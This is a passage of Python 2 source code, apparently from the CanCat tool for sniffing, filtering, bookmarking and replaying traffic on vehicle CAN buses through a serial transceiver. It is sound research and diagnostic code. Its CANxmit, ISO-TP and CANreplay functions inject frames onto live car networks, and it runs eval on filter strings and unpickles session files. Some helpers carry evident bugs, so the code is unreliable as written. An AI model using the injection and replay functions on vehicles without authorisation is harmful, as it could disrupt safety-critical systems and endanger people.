CAN_RESP_FAILTX = (2)
CAN_RESP_MSGAVAIL = (3)
CAN_RESP_NOMSG = (4)
CAN_RESP_CTRLERROR = (5)
CAN_RESP_GETTXBFTIMEOUT = (6)
CAN_RESP_SENDMSGTIMEOUT = (7)
CAN_RESP_FAIL = (0xff)
CAN_RESPS = { v: k for k,v in globals().items() if k.startswith('CAN_RESP') }
# constants for setting baudrate for the CAN bus
CAN_AUTOBPS = 0
CAN_5KBPS = 1
CAN_10KBPS = 2
CAN_20KBPS = 3
CAN_25KBPS = 4
CAN_31K25BPS = 5
CAN_33KBPS = 6
CAN_40KBPS = 7
CAN_50KBPS = 8
CAN_80KBPS = 9
CAN_83K3BPS = 10
CAN_95KBPS = 11
CAN_100KBPS = 12
CAN_125KBPS = 13
CAN_200KBPS = 14
CAN_250KBPS = 15
CAN_500KBPS = 16
CAN_666KBPS = 17
CAN_1000KBPS = 18
# state constants for the Receiver thread
RXTX_DISCONN = -1
RXTX_SYNC = 0
RXTX_GO = 1
# constants for CANreplay mode
TIMING_FAST = 0
TIMING_REAL = 1
TIMING_INTERACTIVE = 2
# constants for VIEW settings:
VIEW_ASCII = 1<<0
VIEW_COMPARE = 1<<1
VIEW_BOOKMARKS = 1<<2
VIEW_TS_DELTA = 1<<3
VIEW_ENDSUM = 1<<4
VIEW_ALL = VIEW_ASCII | VIEW_COMPARE | VIEW_BOOKMARKS | VIEW_TS_DELTA | VIEW_ENDSUM
# message id's and metadata (soon to be moved into modules)
GM_messages = {
}
Ford_messages = {
}
Chrysler_messages = {
}
Toyota_messages = {
}
Honda_messages = {
}
VW_messages = {
}
Nissan_messages = {
}
Mitsubishi_messages = {
}
Hyundai_messages = {
}
Kia_messages = {
}
Suzuki_messages = {
}
Harley_messages = {
}
# helper functions for printing log messages from the CanCat Transceiver
def handleLogToScreen(message, canbuf):
print('LOG: %s' % repr(message))
def handleLogHexToScreen(message, canbuf):
num = struct.unpack("<L", message)
print('LOG: %x' % num)
def handleCanMsgsDuringSniff(message, canbuf, arbids=None):
idx, ts = canbuf._submitMessage(CMD_CAN_RECV, message)
ts = time.time()
arbid, data = canbuf._splitCanMsg(message)
if arbids:
if arbid in arbids:
print reprCanMsg(idx, ts, arbid, data)
else:
print reprCanMsg(idx, ts, arbid, data)
default_cmdhandlers = {
CMD_LOG : handleLogToScreen,
CMD_LOG_HEX: handleLogHexToScreen,
}
def loadCanBuffer(filename):
return pickle.load(file(filename))
def keystop(delay=0):
if os.name == 'posix':
return len(select.select([sys.stdin],[],[],delay)[0])
else:
return msvcrt.kbhit()
class SPECIAL_CASE:
pass
DONT_PRINT_THIS_MESSAGE = SPECIAL_CASE
class CanInterface:
def __init__(self, port=serialdev, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None, max_msgs=None):
'''
CAN Analysis Workspace
This can be subclassed by vendor to allow more vendor-specific code
based on the way each vendor uses the varios Buses
'''
if orig_iface != None:
self._consumeInterface(orig_iface)
return
self._go = False
self._inbuf = ''
self._trash = []
self._messages = {}
self._msg_events = {}
self._queuelock = threading.Lock()
self._max_msgs = max_msgs
self._shutdown = False
self.verbose = verbose
self.port = port
self._baud = baud
self._io = None
self._in_lock = None
self._out_lock = None
self.name = port
self._commsthread = None
self._last_can_msg = None
self.bookmarks = []
self.bookmark_info = {}
self.comments = []
if cmdhandlers == None:
cmdhandlers = default_cmdhandlers
self._cmdhandlers = cmdhandlers
if load_filename != None:
self.loadFromFile(load_filename)
# If we specify a file and no port, assume we just want to read the file, only try to guess
# ports if there is no file specified
if self.port == None and load_filename == None:
self.port = getDeviceFile()
# No filename, can't guess the port, whatcha gonna do?
if self.port == None and load_filename == None:
raise Exception("Cannot find device, and no filename specified. Please try again.")
if self.port != None:
self._reconnect()
self._startRxThread()
def _startRxThread(self):
self._go = True
self._commsthread = threading.Thread(target=self._rxtx)
self._commsthread.setDaemon(True)
self._commsthread.start()
def register_handler(self, cmd, handler):
self._cmdhandlers[cmd] = handler
def remove_handler(self, cmd):
self._cmdhandlers[cmd] = None
def _consumeInterface(self, other):
other._go = False
for k,v in vars(other).items():
setattr(self, k, v)
if other._commsthread != None:
self._startRxThread()
def _reconnect(self, port=None, baud=None):
'''
Attempt to connect/reconnect to the CanCat Transceiver
'''
if self.port == None and port == None:
print "cannot connect to an unspecified port"
return
if self._io != None:
self._io.close()
self._io = serial.Serial(port=self.port, baudrate=self._baud, dsrdtr=True)
self._io.setDTR(True)
# clear all locks and free anything waiting for them
if self._in_lock != None:
while self._in_lock.locked_lock():
self._in_lock.release()
time.sleep(.01)
self._in_lock = threading.Lock()
if self._out_lock != None:
while self._out_lock.locked_lock():
self._out_lock.release()
time.sleep(.01)
self._out_lock = threading.Lock()
time.sleep(1)
return self._io
def __del__(self):
'''
Destructor, called when the CanInterface object is being garbage collected
'''
if isinstance(self._io, serial.Serial):
print "shutting down serial connection"
self._io.close()
self._shutdown = True
if self._commsthread != None:
self._commsthread.wait()
def clearCanMsgs(self):
'''
Clear out all messages currently received on the CAN bus, allowing for
basically a new analysis session without creating a new object/connection
returns a list of the messages
'''
return self.recvall(CMD_CAN_RECV)
def _rxtx(self):
'''
Receiver thread runner. Internal use only.
Processes data from the CanCat transceiver, parses and places messages
into correct mailboxes and/or hands off to pre-configured handlers.
'''
self._rxtx_state = RXTX_SYNC
while not self._shutdown:
try:
if not self._go:
time.sleep(.04)
continue
if self.verbose > 4:
if self.verbose > 5:
print "STATE: %s" % self._rxtx_state
else:
sys.stderr.write('.')
# try to reconnect to disconnected unit (FIXME: not working right yet)
if self._rxtx_state == RXTX_DISCONN:
print "FIXME: reconnect disconnected serial port..."
time.sleep(1)
self._reconnect()
self._rxtx_state = RXTX_SYNC
continue
# fill the queue ##########################################
self._in_lock.acquire()
try:
char = self._io.read()
except serial.serialutil.SerialException, e:
self.errorcode = e
self.log("serial exception")
if "disconnected" in e.message:
self._io.close()
self._rxtx_state = RXTX_DISCONN
continue
finally:
if self._in_lock.locked_lock():
self._in_lock.release()
self._inbuf += char
#self.log("RECV: %s" % repr(self._inbuf), 4)
##########################################################
# FIXME: should we make the rest of this a separate thread, so we're not keeping messages from flowing?
# ====== it would require more locking/synchronizing...
# make sure we're synced
if self._rxtx_state == RXTX_SYNC:
if self._inbuf[0] != "@":
self._queuelock.acquire()
try:
idx = self._inbuf.find('@')
if idx == -1:
self.log("sitting on garbage...", 3)
continue
trash = self._inbuf[:idx]
self._trash.append(trash)
self._inbuf = self._inbuf[idx:]
finally:
self._queuelock.release()
self._rxtx_state = RXTX_GO
# handle buffer if we have anything in it
if self._rxtx_state == RXTX_GO:
if len(self._inbuf) < 3: continue
if self._inbuf[0] != '@':
self._rxtx_state = RXTX_SYNC
continue
pktlen = ord(self._inbuf[1]) + 2 # <size>, doesn't include "@"
if len(self._inbuf) >= pktlen:
self._queuelock.acquire()
try:
cmd = ord(self._inbuf[2]) # first bytes are @<size>
message = self._inbuf[3:pktlen]
self._inbuf = self._inbuf[pktlen:]
finally:
self._queuelock.release()
#if we have a handler, use it
cmdhandler = self._cmdhandlers.get(cmd)
if cmdhandler != None:
cmdhandler(message, self)
# otherwise, file it
else:
self._submitMessage(cmd, message)
self._rxtx_state = RXTX_SYNC
except:
if self.verbose:
sys.excepthook(*sys.exc_info())
def _submitMessage(self, cmd, message):
'''
submits a message to the cmd mailbox. creates mbox if doesn't exist.
*threadsafe*
'''
timestamp = time.time()
self._queuelock.acquire()
try:
mbox = self._messages.get(cmd)
if mbox == None:
mbox = []
self._messages[cmd] = mbox
self._msg_events[cmd] = threading.Event()
mbox.append((timestamp, message))
self._msg_events[cmd].set()
except Exception, e:
self.log("_submitMessage: ERROR: %r" % e, -1)
finally:
self._queuelock.release()
return len(mbox)-1, timestamp
def log(self, message, verbose=2):
'''
print a log message. Only prints if CanCat's verbose setting >=verbose
'''
if self.verbose >= verbose:
print "%.2f %s: %s" % (time.time(), self.name, message)
def recv(self, cmd, wait=None):
'''
Warning: Destructive:
removes a message from a mailbox and returns it.
For CMD_CAN_RECV mailbox, this will alter analysis results!
'''
start = time.time()
while (time.time() - start) < wait:
mbox = self._messages.get(cmd)
if mbox != None and len(mbox):
self._queuelock.acquire()
try:
timestamp, message = mbox.pop(0)
finally:
self._queuelock.release()
return timestamp, message
time.sleep(.01)
return None, None
def recvall(self, cmd):
'''
Warning: Destructive:
removes ALL messages from a mailbox and returns them.
For CMD_CAN_RECV mailbox, this is like getting a new
analysis session
'''
mbox = self._messages.get(cmd)
if mbox == None:
return []
self._queuelock.acquire()
try:
messages = list(mbox)
self._messages[cmd] = []
finally:
self._queuelock.release()
return messages
def _inWaiting(self, cmd):
'''
Does the given cmd mailbox have any messages??
'''
mbox = self._messages.get(cmd)
if mbox == None:
return 0
return len(mbox)
def _send(self, cmd, message):
'''
Send a message to the CanCat transceiver (not the CAN bus)
'''
msgchar = struct.pack(">H", len(message) + 3) # 2 byte Big Endian
msg = msgchar + chr(cmd) + message
self.log("XMIT: %s" % repr(msg), 4)
self._out_lock.acquire()
try:
self._io.write(msg)
finally:
self._out_lock.release()
# FIXME: wait for response?
def CANrecv(self, count=1):
'''
Warning: Destructive:
removes a message from the received CAN messages and returns it.
== This will alter analysis results! ==
'''
if count == -1:
count = self.getCanMsgCount()
for x in range(count):
yield self.recv(CMD_CAN_RECV)
def CANxmit(self, arbid, message, extflag=0, timeout=3, count=1):
'''
Transmit a CAN message on the attached CAN bus
Currently returns the *last* result
'''
msg = struct.pack('>I', arbid) + chr(extflag) + message
for i in range(count):
self._send(CMD_CAN_SEND, msg)
ts, result = self.recv(CMD_CAN_SEND_RESULT, timeout)
if result == None:
print "CANxmit: Return is None!?"
return None
resval = ord(result)
if resval != 0:
print "CANxmit() failed: %s" % CAN_RESPS.get(resval)
return resval
def ISOTPxmit(self, tx_arbid, rx_arbid, message, extflag=0, timeout=3, count=1):
'''
Transmit an ISOTP can message. tx_arbid is the arbid we're transmitting,
and rx_arbid is the arbid we're listening for
'''
msg = struct.pack('>IIB', tx_arbid, rx_arbid, extflag) + message
for i in range(count):
self._send(CMD_CAN_SEND_ISOTP, msg)
ts, result = self.recv(CMD_CAN_SEND_ISOTP_RESULT, timeout)
if result == None:
print "ISOTPxmit: Return is None!?"
resval = ord(result)
if resval != 0:
print "ISOTPxmit() failed: %s" % CAN_RESPS.get(resval)
return resval
def ISOTPrecv(self, tx_arbid, rx_arbid, extflag=0, timeout=3, count=1, start_msg_idx=None):
'''
Receives an ISOTP can message. This function just causes
the hardware to send the appropriate flow control command
when an ISOTP frame is received from rx_arbid, using
tx_arbid for the flow control frame. The ISOTP frame
itself needs to be extracted from the received can messages
'''
if start_msg_idx is None:
start_msg_idx = self.getCanMsgCount()
# set the CANCat to respond to Flow Control messages
resval = self._isotp_enable_flowcontrol(tx_arbid, rx_arbid, extflag)
msg = self._getIsoTpMsg(rx_arbid, start_index=start_msg_idx, timeout=timeout)
return msg
def _isotp_enable_flowcontrol(self, tx_arbid, rx_arbid, extflag):
msg = struct.pack('>IIB', tx_arbid, rx_arbid, extflag)
self._send(CMD_CAN_RECV_ISOTP, msg)
ts, result = self.recv(CMD_CAN_RECV_ISOTP_RESULT, timeout)
if result == None:
print "_isotp_enable_flowcontrol: Return is None!?"
resval = ord(result)
if resval != 0:
print "_isotp_enable_flowcontrol() failed: %s" % CAN_RESPS.get(resval)
return resval
def ISOTPxmit_recv(self, tx_arbid, rx_arbid, message, extflag=0, timeout=3, count=1, service=None):
'''
Transmit an ISOTP can message, then wait for a response.
tx_arbid is the arbid we're transmitting, and rx_arbid
is the arbid we're listening for
'''
currIdx = self.getCanMsgCount()
msg = struct.pack('>II', tx_arbid, rx_arbid) + chr(extflag) + message
for i in range(count):
self._send(CMD_CAN_SENDRECV_ISOTP, msg)
ts, result = self.recv(CMD_CAN_SENDRECV_ISOTP_RESULT, timeout)
if result == None:
print "ISOTPxmit: Return is None!?"
resval = ord(result)
if resval != 0:
print "ISOTPxmit() failed: %s" % CAN_RESPS.get(resval)
msg = self._isotp_get_msg(rx_arbid, start_index = currIdx, service = service, timeout = timeout)
return msg
def _isotp_get_msg(self, rx_arbid, start_index=0, service=None, timeout=None):
'''
Internal Method to piece together a valid ISO-TP message from received CAN packets.
'''
found = False
complete = False
starttime = lasttime = time.time()
while not complete and (not timeout or (lasttime-starttime < timeout)):
msgs = [msg for msg in self.genCanMsgs(start=start_index, arbids=[rx_arbid])]
if len(msgs):
try:
# Check that the message is for the expected service, if specified
arbid, msg, count = iso_tp.msg_decode(msgs)
if ord(msg[0]) == 0x7e: # response for TesterPresent... ignore
start_index = msgs[count-1][0] + 1
elif service is not None:
# Check if this is the right service, or there was an error
if ord(msg[0]) == service or ord(msg[0]) == 0x7f:
msg_found = True
return msg
print "Hey, we got here, wrong service code?"
print msg.encode('hex')
start_index = msgs[count-1][0] + 1
else:
msg_found = True
return msg
except iso_tp.IncompleteIsoTpMsg, e:
#print e # debugging only, this is expected
pass
time.sleep(0.1)
lasttime = time.time()
#print "_isotp_get_msg: status: %r - %r (%r) > %r" % (lasttime, starttime, (lasttime-starttime), timeout)
print "_isotp_get_msg: Timeout: %r - %r (%r) > %r" % (lasttime, starttime, (lasttime-starttime), timeout)
return None
def CANsniff(self, start_msg=None, arbids=None, advfilters=[], maxmsgs=None):
'''
Print messages in real time.
start_msg - first message to print
(None: the next message captured, 0: first message since starting CanCat)
arbids - list of arbids to print (others will be ignored)
advfilters - list of python code to eval for each message (message context provided)
eg. ['pf==0xeb', 'sa==0', 'ps & 0xf']
will print TP data message from source address 0 if the top 4 bits of PS
are set.
Expressions are evaluated from left to right in a "and" like fashion. If any
expression evaluates to "False" and the message will be ignored.
Variables mapped into default namespace:
'arbid'
'id'
'ts'
'data'
J1939 adds 'pgn', 'pf', 'ps', 'edp', 'dp', 'sa'
(this description is true for all advfilters, not specifically CANsniff)
'''
count = 0
msg_gen = self.reprCanMsgsLines(start_msg=start_msg, arbids=arbids, advfilters=advfilters, tail=True)
while True:
if maxmsgs != None and maxmsgs < count:
return
line = msg_gen.next()
print line
count += 1
if keystop():
break
def CANreplay(self, start_bkmk=None, stop_bkmk=None, start_msg=0, stop_msg=None, arbids=None, timing=TIMING_FAST):
'''
Replay packets between two bookmarks.
timing = TIMING_FAST: just slam them down the CAN bus as fast as possible
timing = TIMING_READ: send the messages using similar timing to how they
were received
timing = TIMING_INTERACTIVE: wait for the user to press Enter between each
message being transmitted
'''
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
last_time = -1
newstamp = time.time()
for idx,ts,arbid,data in self.genCanMsgs(start_msg, stop_msg, arbids=arbids):
laststamp = newstamp
newstamp = time.time()
delta_correction = newstamp - laststamp
if timing == TIMING_INTERACTIVE:
char = raw_input("Transmit this message? %s (Y/n)" % reprCanMsg(idx, ts, arbid, data))
if char is not None and len(char) > 0 and char[0] == 'n':
return
elif timing == TIMING_REAL:
if last_time != -1:
delta = ts - last_time - delta_correction
if delta >= 0:
time.sleep(delta)
last_time = ts
self.CANxmit(arbid, data)
if timing == TIMING_INTERACTIVE:
print "Message transmitted"
def setCanBaud(self, baud_const=CAN_500KBPS):
'''
set the baud rate for the CAN bus. this has nothing to do with the
connection from the computer to the tool
'''
self._send(CMD_CAN_BAUD, chr(baud_const))
response = self.recv(CMD_CAN_BAUD_RESULT, wait=30)
while(response[1] != '\x01'):
print "CAN INIT FAILED: Retrying"
response = self.recv(CMD_CAN_BAUD_RESULT, wait=30)
def setCanMode(self, mode):
'''
Sets the desired operation mode. Note that just setting the operational mode
does not change anything on the hardware, after changing the mode you must change
the baud rate in order to properly configure the hardware
'''
CAN_MODES = { v: k for k,v in globals().items() if k.startswith('CMD_CAN_MODE_') and k is not 'CMD_CAN_MODE_RESULT' }
if mode not in CAN_MODES:
print "{} is not a valid can mode. Valid modes are:".format(mode)
for k in CAN_MODES:
print "{} ({})".format(CAN_MODES[k], k)
else:
self._send(CMD_CAN_MODE, chr(mode))
response = self.recv(CMD_CAN_MODE_RESULT, wait=30)
while(response[1] != '\x01'):
print "CAN INIT FAILED: Retrying"
response = self.recv(CMD_CAN_MODE_RESULT, wait=30)
def ping(self, buf='ABCDEFGHIJKL'):
'''
Utility function, only to send and receive data from the
CanCat Transceiver. Has no effect on the CAN bus
'''
self._send(CMD_PING, buf)
response = self.recv(CMD_PING_RESPONSE, wait=3)
return response
def genCanMsgs(self, start=0, stop=None, arbids=None, tail=False, maxsecs=None):
'''
CAN message generator. takes in start/stop indexes as well as a list
of desired arbids (list)
maxsecs limits the number of seconds this generator will go for. it's intended
for use with tail
'''
messages = self._messages.get(CMD_CAN_RECV, None)
# get the ts of the first received message
if messages != None and len(messages):
startts = messages[0][0]
else:
startts = time.time()
if start == None:
start = self.getCanMsgCount()
if stop == None or tail:
stop = len(messages)
else:
stop = stop + 1 # This makes the stop index inclusive if specified
starttime = time.time()
idx = start
while tail or idx < stop:
# obey our time restrictions
# placed here to ensure checking whether we're receiving messages or not
if maxsecs != None and time.time() > maxsecs+starttime:
return
# if we're off the end of the original request, and "tailing"
if tail and idx >= stop:
msglen = len(messages)
self.log("stop=%d len=%d" % (stop, msglen), 3)
if stop == msglen:
self.log("waiting for messages", 3)
# wait for trigger event so we're not constantly polling
self._msg_events[CMD_CAN_RECV].wait(1)
self._msg_events[CMD_CAN_RECV].clear()
self.log("received 'new messages' event trigger", 3)
# we've gained some messages since last check...
stop = len(messages)
continue # to the big message loop.
# now actually handle messages
ts, msg = messages[idx]
# make ts an offset instead of the real time.
ts -= startts
arbid, data = self._splitCanMsg(msg)
if arbids != None and arbid not in arbids:
# allow filtering of arbids
idx += 1
continue
yield((idx, ts, arbid, data))
idx += 1
def _splitCanMsg(self, msg):
'''
takes in captured message
returns arbid and data
does not check msg size. MUST be at least 4 bytes in length as the
tool should send 4 bytes for the arbid
'''
arbid = struct.unpack(">I", msg[:4])[0]
data = msg[4:]
return arbid, data
def getCanMsgCount(self):
'''
the number of CAN messages we've received this session
'''
canmsgs = self._messages.get(CMD_CAN_RECV, [])
return len(canmsgs)
def printSessionStatsByBookmark(self, start=None, stop=None):
'''
Prints session stats only for messages between two bookmarks
'''
print self.getSessionStatsByBookmark(start, stop)
def printSessionStats(self, start=0, stop=None):
'''
Print session stats by Arbitration ID (aka WID/PID/CANID/etc...)
between two message indexes (where they sit in the CMD_CAN_RECV
mailbox)
'''
print self.getSessionStats(start, stop)
def getSessionStatsByBookmark(self, start=None, stop=None):
'''
returns session stats by bookmarks
'''
if start != None:
start_msg = self.getMsgIndexFromBookmark(start)
else:
start_msg = 0
if stop != None:
stop_msg = self.getMsgIndexFromBookmark(stop)
else:
stop_msg = self.getCanMsgCount()
return self.getSessionStats(start=start_msg, stop=stop_msg)
def getArbitrationIds(self, start=0, stop=None, reverse=False):
'''
return a list of Arbitration IDs
'''
arbids = {}
msg_count = 0
for idx,ts,arbid,data in self.genCanMsgs(start, stop):
arbmsgs = arbids.get(arbid)
if arbmsgs == None:
arbmsgs = []
arbids[arbid] = arbmsgs
arbmsgs.append((ts, data))
msg_count += 1
arbid_list = [(len(msgs), arbid, msgs) for arbid,msgs in arbids.items()]
arbid_list.sort(reverse=reverse)
return arbid_list
def getSessionStats(self, start=0, stop=None):
out = []
arbid_list = self.getArbitrationIds(start=start, stop=stop, reverse=True)
for datalen, arbid, msgs in arbid_list:
last = 0
high = 0
low = 0xffffffff
for ts, data in msgs:
if last == 0:
last = ts
continue
# calculate the high and low
delta = ts - last
if delta > high:
high = delta
if delta < low:
low = delta
# track repeated values (rounded to nearest .001 sec)
last = ts
if datalen > 1:
mean = (msgs[-1][0] - msgs[0][0]) / (datalen-1)
median = low + (high-low) / 2
else:
low = 0
mean = 0
median = mean
out.append("id: 0x%x\tcount: %d\ttiming:: mean: %.3f\tmedian: %.3f\thigh: %.3f\tlow: %.3f" % \
(arbid, datalen, mean, median, high, low))
msg_count = self.getCanMsgCount()
out.append("Total Uniq IDs: %d\nTotal Messages: %d" % (len(arbid_list), msg_count))
return '\n'.join(out)
def loadFromFile(self, filename, force=False):
'''
Load a previous analysis session from a saved file
see: saveSessionToFile()
'''
me = pickle.load(file(filename))
self.restoreSession(me, force=force)
self._filename = filename
def restoreSession(self, me, force=False):
'''
Load a previous analysis session from a python dictionary object
see: saveSession()
'''
if isinstance(self._io, serial.Serial) and force==False:
print("Refusing to reload a session while active session! use 'force=True' option")
return
self._messages = me.get('messages')
self.bookmarks = me.get('bookmarks')
self.bookmark_info = me.get('bookmark_info')
self.comments = me.get('comments')
def saveSessionToFile(self, filename=None):
'''
Saves the current analysis session to the filename given
If saved previously, the name will already be cached, so it is
unnecessary to provide it again.
'''
if filename != None:
self._filename = filename
elif self._filename == None:
raise Exception('Cannot save to file when no filename given (and first time save)')
else:
filename = self._filename
savegame = self.saveSession()
me = pickle.dumps(savegame)
outfile = file(filename, 'w')
outfile.write(me)
outfile.close()
def saveSession(self):
'''
Save the current analysis session to a python dictionary object
What you do with it form there is your own business.
This function is called by saveSessionToFile() to get the data
to save to the file.
'''
savegame = { 'messages' : self._messages,
'bookmarks' : self.bookmarks,
'bookmark_info' : self.bookmark_info,
'comments' : self.comments,
}
return savegame
# bookmark subsystem
def placeCanBookmark(self, name=None, comment=None):
'''
Save a named bookmark (with optional comment).
This stores the message index number from the
CMD_CAN_RECV mailbox.
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
mbox = self._messages.get(CMD_CAN_RECV)
if mbox == None:
msg_index = 0
else:
msg_index = len(mbox)
bkmk_index = len(self.bookmarks)
self.bookmarks.append(msg_index)
info = { 'name' : name,
'comment' : comment }
self.bookmark_info[bkmk_index] = info #should this be msg_index? benefit either way?
return bkmk_index
def getMsgIndexFromBookmark(self, bkmk_index):
return self.bookmarks[bkmk_index]
def getBookmarkFromMsgIndex(self, msg_index):
bkmk_index = self.bookmarks.index(msg_index)
return bkmk_index
def setCanBookmarkName(self, bkmk_index, name):
info = self.bookmark_info[bkmk_index]
info[name] = name
def setCanBookmarkComment(self, bkmk_index, comment):
info = self.bookmark_info[bkmk_index]
info[name] = name
def setCanBookmarkNameByMsgIndex(self, msg_index, name):
bkmk_index = self.bookmarks.index(msg_index)
info = self.bookmark_info[bkmk_index]
info[name] = name
def setCanBookmarkCommentByMsgIndex(self, msg_index, comment):
bkmk_index = self.bookmarks.index(msg_index)
info = self.bookmark_info[bkmk_index]
info[name] = name
def snapshotCanMessages(self, name=None, comment=None):
'''
Save bookmarks at the start and end of some event you are about to do
Bookmarks are named "Start_" + name and "Stop_" + name
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
start_bkmk = self.placeCanBookmark("Start_" + name, comment)
raw_input("Press Enter When Done...")
stop_bkmk = self.placeCanBookmark("Stop_" + name, comment)
def filterCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmark(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmark(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.filterCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def _getLocals(self, idx, ts, arbid, data):
return {'idx':idx, 'ts':ts, 'arbid':arbid, 'data':data}
def filterCanMsgs(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], tail=False, maxsecs=None):
'''
returns the received CAN messages between indexes "start_msg" and "stop_msg"
but only messages to ID's that *do not* appear in the the baseline indicated
by "start_baseline_msg" and "stop_baseline_msg".
for message indexes, you *will* want to look into the bookmarking subsystem!
'''
self.log("starting filtering messages...")
if stop_baseline_msg != None:
self.log("ignoring arbids from baseline...")
# get a list of baseline arbids
filter_ids = { arbid:1 for idx,ts,arbid,data in self.genCanMsgs(start_baseline_msg, stop_baseline_msg)
}.keys()
else:
filter_ids = None
self.log("filtering messages...")
if arbids != None and type(arbids) != list:
arbids = [arbids]
for idx,ts,arbid,msg in self.genCanMsgs(start_msg, stop_msg, arbids=arbids, tail=tail, maxsecs=maxsecs):
if not ((arbids != None and arbid in arbids) or arbid not in ignore and (filter_ids==None or arbid not in filter_ids)):
self.log("skipping message: (%r, %r, %r, %r)" % ((idx, ts, arbid, msg)))
continue
# advanced filters allow python code to be handed in. if any of the python code snippits result in "False" or 0, skip this message
skip = False
for advf in advfilters:
lcls = self._getLocals(idx, ts, arbid, msg)
if not eval(advf, lcls):
skip = True
if skip:
self.log("skipping message(adv): (%r, %r, %r, %r)" % ((idx, ts, arbid, msg)))
continue
yield (idx, ts, arbid, msg)
def printCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use printCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
print self.reprCanMsgsByBookmark(start_bkmk, stop_bkmk, start_baseline_bkmk, stop_baseline_bkmk, arbids, ignore, advfilters)
def reprCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None, arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use reprCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
out = []
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
else:
stop_bkmk = -1
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmark(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmark(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.reprCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def printCanMsgs(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, paginate=None, viewbits=VIEW_ALL):
data = self.reprCanMsgsLines(start_msg, stop_msg, start_bkmk, stop_bkmk, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters, pretty, viewbits=viewbits)
pidx = 0
try:
while True:
line = data.next()
lines = line.split('\n')
for thing in lines:
print thing
pidx += 1
if paginate != None and pidx % paginate == 0:
inp = raw_input("PRESS ENTER TO CONTINUE")
except StopIteration:
pass
def reprCanMsgsLines(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, tail=False, viewbits=VIEW_ALL):
# FIXME: make different stats selectable using a bitfield arg (eg. REPR_TIME_DELTA | REPR_ASCII)
'''
String representation of a set of CAN Messages.
These can be filtered by start and stop message indexes, as well as
use a baseline (defined by start/stop message indexes),
by a list of "desired" arbids as well as a list of
ignored arbids
Many functions wrap this one.
viewbits is a bitfield made up of VIEW_* options OR'd together:
... viewbits=VIEW_ASCII|VIEW_COMPARE)
'''
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
if (viewbits & VIEW_BOOKMARKS) and start_msg in self.bookmarks:
bkmk = self.bookmarks.index(start_msg)
yield ("starting from bookmark %d: '%s'" %
(bkmk,
self.bookmark_info[bkmk].get('name'))
)
if (viewbits & VIEW_BOOKMARKS) and stop_msg in self.bookmarks:
bkmk = self.bookmarks.index(stop_msg)
yield ("stoppng at bookmark %d: '%s'" %
(bkmk,
self.bookmark_info[bkmk].get('name'))
)
last_msg = None
next_bkmk = 0
next_bkmk_idx = 0
msg_count = 0
last_ts = None
tot_delta_ts = 0
counted_msgs = 0 # used for calculating averages, excluding outliers
data_delta = None
data_repeat = 0
data_similar = 0
for idx, ts, arbid, msg in self.filterCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids=arbids, ignore=ignore, advfilters=advfilters, tail=tail):
# insert bookmark names/comments in appropriate places
while next_bkmk_idx < len(self.bookmarks) and idx >= self.bookmarks[next_bkmk_idx]:
yield (self.reprBookmark(next_bkmk_idx))
next_bkmk_idx += 1
msg_count += 1
diff = []
# check data
byte_cnt_diff = 0
if (viewbits & VIEW_COMPARE) and last_msg != None:
if len(last_msg) == len(msg):
for bidx in range(len(msg)):
if last_msg[bidx] != msg[bidx]:
byte_cnt_diff += 1
if byte_cnt_diff == 0:
diff.append("REPEAT")
data_repeat += 1
elif byte_cnt_diff <=4:
diff.append("Similar")
data_similar += 1
# FIXME: make some better heuristic to identify "out of norm"
# look for ASCII data (4+ consecutive bytes)
if (viewbits & VIEW_ASCII) and hasAscii(msg):
diff.append("ASCII: %s" % repr(msg))
# calculate timestamp delta and comment if out of whack
if last_ts == None:
last_ts = ts
delta_ts = ts - last_ts
if counted_msgs:
avg_delta_ts = tot_delta_ts / counted_msgs
else:
avg_delta_ts = delta_ts
if abs(delta_ts - avg_delta_ts) <= delta_ts:
tot_delta_ts += delta_ts
counted_msgs += 1
elif (viewbits & VIEW_TS_DELTA):
